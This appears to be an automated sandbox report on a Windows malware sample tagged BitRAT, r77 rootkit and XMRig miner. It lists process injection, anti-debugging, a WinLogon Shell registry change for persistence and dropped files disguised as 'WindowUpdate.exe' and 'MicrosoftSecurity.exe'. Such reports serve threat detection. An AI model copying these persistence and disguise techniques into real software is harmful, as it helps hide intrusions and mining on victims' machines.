Malware Analysis Report

2025-01-02 06:58

Sample ID 220310-qsmakafcb7
Target 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128
SHA256 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128
Tags
bitrat r77 xmrig miner persistence rootkit trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128

Threat Level: Known bad

The file 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128 was found to be: Known bad.

Malicious Activity Summary

bitrat r77 xmrig miner persistence rootkit trojan

xmrig

Modifies WinLogon for persistence

r77 rootkit payload

BitRAT

r77

XMRig Miner Payload

Executes dropped EXE

Checks computer location settings

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Program crash

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-10 13:31

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-10 13:31

Reported

2022-03-10 13:34

Platform

win7-20220223-en

Max time kernel

4294178s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe"

Signatures

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1720 wrote to memory of 552 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 552 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 552 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 552 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1696 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1696 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1696 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1696 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1208 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1208 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1208 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1208 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 860 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 860 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 860 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 860 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 708 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 708 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 708 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 708 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1244 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1244 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1244 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1244 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1464 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1464 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1464 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1464 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1128 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1128 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1128 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1128 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1472 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1472 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1472 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1472 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1468 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1468 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1468 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1468 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

Processes

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

"C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe"

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

Network

N/A

Files

memory/1720-54-0x0000000000170000-0x0000000000692000-memory.dmp

memory/1720-55-0x0000000074580000-0x0000000074C6E000-memory.dmp

memory/1720-56-0x0000000004E00000-0x0000000004E01000-memory.dmp

memory/1720-57-0x0000000006250000-0x0000000006758000-memory.dmp

memory/1720-58-0x0000000000810000-0x000000000082C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-10 13:31

Reported

2022-03-10 13:35

Platform

win10v2004-en-20220112

Max time kernel

162s

Max time network

165s

Command Line

"C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe"

Signatures

BitRAT

trojan bitrat

Modifies WinLogon for persistence

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\WindowUpdate.exe\"," | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | N/A

r77

rootkit r77

r77 rootkit payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

xmrig

miner xmrig

XMRig Miner Payload

miner
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A

Enumerates physical storage devices

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3768 wrote to memory of 1488 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 1488 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 1488 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 648 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 648 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 648 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 428 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 428 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
